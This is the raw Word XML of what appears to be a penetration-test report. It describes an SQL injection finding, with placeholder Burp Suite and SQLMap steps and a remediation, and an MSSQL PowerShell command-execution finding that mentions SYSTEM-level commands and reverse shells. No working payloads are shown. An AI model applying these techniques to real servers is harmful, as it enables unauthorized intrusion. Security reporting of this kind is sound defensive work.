      <w:r w:rsidRPr="0D325B6E" w:rsidR="386445C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashes</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="386445C2">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0D325B6E" w:rsidR="44793025">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password</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1843F7D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</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 personal information, and confidential business information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0F651F41" w14:textId="629A251E">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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="12711053" w14:textId="0FA716C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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="5A963FA9" w14:textId="5BE05BE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Using a tool such as </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Burp Suite</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capture a request of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 (Website, Login Request, Search Request, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="7173C8D7" w14:textId="1259C7E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>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[Picture of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Burp Suite</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Capture]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="4DBA0F59" w14:textId="4CE489D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Step 2: Using a tool like SQLMap, attach the request and get the database name or other database and table information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="670287FF" w14:textId="12673E9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Command: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[SQLMap Command]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="4481BE9C" w14:textId="4482004D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>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[Picture of SQLMap Command Completed]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0AAEF19B" w14:textId="556ACED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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="0A7D5E02" w14:textId="7351611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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="2ADAEBEB" w14:textId="32B1198F">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2A5E43B8">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3B0E0EAE" w:rsidP="0D325B6E" w:rsidRDefault="3B0E0EAE" w14:paraId="63FDAD98" w14:textId="1F93AF44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>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B0E0EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A5E43B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the source code </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to include</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proper input sanitization when handling the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55C3351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5C3351E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to prevent user input from overwriting the intended SQL statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="44984062" w14:textId="1F8E8011">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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="0B5FE353" w14:textId="75EB4E6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5C3351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F43474C" w:rsidP="0D325B6E" w:rsidRDefault="4F43474C" w14:paraId="60B90454" w14:textId="4180C0D6">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R11d70dd5def34a95">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4F43474C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>OWASP - SQL Injection</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1A763CC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve"> Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4F43474C" w:rsidP="0D325B6E" w:rsidRDefault="4F43474C" w14:paraId="1C52376C" w14:textId="08A273F7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Re183ad76c54042e5">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4F43474C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>OWASP - SQL Injection Prevention Cheat Shee</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4F43474C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4B8E9CC2" w14:textId="00626380">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5E002C63" w14:textId="5CCCF8EA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7663DF83" w:rsidP="0D325B6E" w:rsidRDefault="7663DF83" w14:paraId="4BE342A3" w14:textId="2B8C1ECE">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2117457693" w:id="2014931343"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7663DF83">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7663DF83">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc81256827" w:id="879967035"/>
      <w:bookmarkStart w:name="_Toc1820292818" w:id="97661962"/>
      <w:bookmarkStart w:name="_Toc271309992" w:id="1048214778"/>
      <w:bookmarkStart w:name="_Toc1084834776" w:id="365985702"/>
      <w:bookmarkStart w:name="_Toc2035529674" w:id="24197103"/>
      <w:bookmarkStart w:name="_Toc1046491219" w:id="1156996550"/>
      <w:bookmarkStart w:name="_Toc944739018" w:id="1497486014"/>
      <w:bookmarkStart w:name="_Toc1692166561" w:id="1029226598"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="45693DE3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03BD4BED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MSSQL PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03BD4BED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03BD4BED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1156996550"/>
      <w:bookmarkEnd w:id="1497486014"/>
      <w:bookmarkEnd w:id="1029226598"/>
      <w:bookmarkEnd w:id="879967035"/>
      <w:bookmarkEnd w:id="97661962"/>
      <w:bookmarkEnd w:id="1048214778"/>
      <w:bookmarkEnd w:id="365985702"/>
      <w:bookmarkEnd w:id="24197103"/>
      <w:bookmarkEnd w:id="201493134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50FCED6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CB5935" w14:textId="513D4BE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32FC41" w14:textId="1FC24CF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0C580C" w14:textId="0472D79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AD0406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F72367" w14:textId="7B07D7A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7112A72" w14:textId="322F739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B08B452" w14:textId="32C0CA13">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6DB82208">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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0CF9ADC" w14:textId="1FB3685A">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2585FE2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BEE9AB" w14:textId="01770A6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E5A6E18" w14:textId="1F31D5BB">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166CB9A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BE8EC2F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2FFBE72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908748" w14:textId="202D3E5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45C9031" w:rsidP="0D325B6E" w:rsidRDefault="345C9031" w14:paraId="04E0A085" w14:textId="0AEF98AD">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A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" r:id="Reecd9f919e224a0c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="345C9031">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:A/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="345C9031">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="345C9031">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="345C9031">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="22B2B5B5">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74E3518" w14:textId="54EA2C1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1291D4E" w:rsidP="0D325B6E" w:rsidRDefault="51291D4E" w14:paraId="321E6B9C" w14:textId="2E12548B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="51291D4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5589AA6" w:rsidP="0D325B6E" w:rsidRDefault="55589AA6" w14:paraId="6589F80E" w14:textId="5A83255F">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R13e686de6cf0409f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="55589AA6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1059: Command and Scripting Interpreter</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="28233FAB">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7B2B392"/>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268B331" w:rsidP="0D325B6E" w:rsidRDefault="6268B331" w14:paraId="5F791D8C" w14:textId="5520455A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="6268B331">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414BC39" w:rsidP="0D325B6E" w:rsidRDefault="7414BC39" w14:paraId="11F3E786" w14:textId="58015F75">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R6845f13842b34c28">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7414BC39">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1038: Execution Prevention, Mitigation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="7414BC39">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60ED46D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C6B0809" w14:textId="4F80700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B8C252A" w14:textId="75A094D4">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156330F" w14:textId="2786D559">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="45693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="194CD08D" w14:textId="3C6C2DC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693DE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108855E" w:rsidP="0D325B6E" w:rsidRDefault="6108855E" w14:paraId="52A0C86F" w14:textId="70CE2DC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08855E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The MSSQL Server </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61D77C4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61D77C4E">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61D77C4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="141F5999">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a feature which is</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61D77C4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> disabled by default. This allows for an attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27D350BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">er to run PowerShell commands from the SQL Server environment, giving an attacker arbitrary </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3ACAF7DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell command</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27D350B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17FCA6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">execution </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27D350BC">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16D67C33">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7D350B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7D350BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NT Authority\SYSTE</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DEBA310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DEBA310">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24C6D15D" w14:textId="68CCF15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5693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="1524853E" w14:textId="53D7D767">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5693DE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4A4B735" w:rsidP="0D325B6E" w:rsidRDefault="44A4B735" w14:paraId="3201F894" w14:textId="4CB2A82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A4B735">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that has gained unauthorized access to the MSSQL S</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erver can run arbitrary </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co</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0FF32893">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mmands</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as a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28125143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly privileged user</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 on </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bac</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kend</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E18A9CF">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indows system. This allows an attacker to run a reverse shell script that gives them access to the Windows server</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="720EF827">
        <w:rPr>
